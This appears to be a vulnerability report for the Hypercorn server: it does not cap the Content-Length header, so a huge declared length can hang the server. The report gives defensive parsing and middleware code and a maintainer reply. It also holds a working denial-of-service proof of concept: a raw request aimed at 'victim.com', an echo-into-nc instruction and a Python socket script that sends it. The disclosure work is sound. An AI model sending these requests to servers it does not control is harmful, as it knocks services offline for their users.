Unbounded Content-Length Parsing Issue
Summary
Hypercorn does not correctly validate the Content-Length header in HTTP requests, failing to enforce a maximum allowable request body size.
Details
RFC 9110 says this:
Since there is no predefined limit to the length of content, a recipient MUST anticipate potentially large decimal numerals and prevent parsing errors due to integer conversion overflows or precision loss due to integer conversion.
This means the server must ensure that it does not overflow or lose precision when parsing this number, and must enforce its own maximum allowable request body size. However, Hypercorn neither verifies the value of Content-Length nor enforces a maximum request body size, which can leave the server hanging and unresponsive.
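As a rough illustration of the check the RFC calls for, the sketch below parses a Content-Length value against an explicit cap. The MAX_BODY_SIZE name and the 16 MiB value are made up for the example; this is not Hypercorn's actual parsing code.

import re

# Example cap on the declared body size; the value is arbitrary and would be
# configured by the server operator in practice.
MAX_BODY_SIZE = 16 * 1024 * 1024  # 16 MiB

def parse_content_length(value: str) -> int:
    # RFC 9110 defines Content-Length as one or more ASCII digits.
    if not re.fullmatch(r"[0-9]+", value.strip()):
        raise ValueError("400 Bad Request: malformed Content-Length")
    # Python integers are arbitrary precision, so int() itself cannot overflow,
    # but the declared size must still be capped before the server commits to
    # reading (or waiting for) that many bytes.
    length = int(value)
    if length > MAX_BODY_SIZE:
        raise ValueError("413 Content Too Large: declared body exceeds the cap")
    return length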
Example
POST / HTTP/1.1\r\n
Host: victim.com\r\n
Content-Length: 9999999999999999999999999999999999999999999999\r\n
\r\n
Hello,world\r\n
\r\n
Suggested action
Strictly follow the RFC specifications when parsing requests, and verify that the Content-Length header value does not exceed the maximum allowable request body size. If the declared length exceeds that limit, the request should be rejected immediately with a 400 (Bad Request) or similar error response.
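One possible stop-gap at the application layer, until the server itself enforces a limit, is an ASGI middleware that answers oversized declarations with a 400 before the body is consumed. The class name and limit below are hypothetical, and this only helps once the request has reached the application; it does not replace a fix in Hypercorn's own request parsing.

# Hypothetical ASGI middleware: reject requests whose declared Content-Length
# exceeds a configured limit with a 400 response.
MAX_DECLARED_LENGTH = 16 * 1024 * 1024  # example limit, 16 MiB

class ContentLengthLimitMiddleware:
    def __init__(self, app, limit: int = MAX_DECLARED_LENGTH):
        self.app = app
        self.limit = limit

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            for name, value in scope.get("headers", []):
                if name == b"content-length" and (
                    not value.isdigit() or int(value) > self.limit
                ):
                    # Answer immediately and close instead of waiting for a
                    # body that may never arrive.
                    await send({
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-length", b"0"),
                                    (b"connection", b"close")],
                    })
                    await send({"type": "http.response.body", "body": b""})
                    return
        await self.app(scope, receive, send)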
PoC
The example request is embedded in the previous section. Send it to the server, e.g. by piping it from echo -ne into nc.
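If nc is not available, a small Python script can send the same bytes; the host and port below are placeholders for a locally running Hypercorn instance.

import socket

HOST, PORT = "127.0.0.1", 8000  # placeholder target

request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.com\r\n"
    b"Content-Length: 9999999999999999999999999999999999999999999999\r\n"
    b"\r\n"
    b"Hello,world\r\n"
    b"\r\n"
)

with socket.create_connection((HOST, PORT), timeout=10) as sock:
    sock.sendall(request)
    try:
        # A vulnerable server keeps waiting for the rest of the declared body
        # instead of responding, so this recv is expected to time out.
        print(sock.recv(4096))
    except socket.timeout:
        print("no response within 10s (server is waiting for the declared body)")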
Impact
Because no maximum request body size is enforced, an attacker can send HTTP requests whose Content-Length declares an extremely large value, potentially resulting in a denial of service.
The version we tested was 84d06b8.
Well, I guess the underlying h11 library didn't handle that properly... Does it help if you add a small read_timeout to the config?
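For reference, setting that programmatically would look roughly like the sketch below, assuming Hypercorn's read_timeout option behaves as its name suggests; whether it actually mitigates this hang has not been verified here.

import asyncio

from hypercorn.asyncio import serve
from hypercorn.config import Config

async def app(scope, receive, send):
    # Trivial placeholder ASGI app.
    if scope["type"] != "http":
        return
    await send({"type": "http.response.start", "status": 200,
                "headers": [(b"content-length", b"2")]})
    await send({"type": "http.response.body", "body": b"ok"})

config = Config()
config.bind = ["127.0.0.1:8000"]
config.read_timeout = 5  # seconds before a stalled read is given up (assumed semantics)

if __name__ == "__main__":
    asyncio.run(serve(app, config))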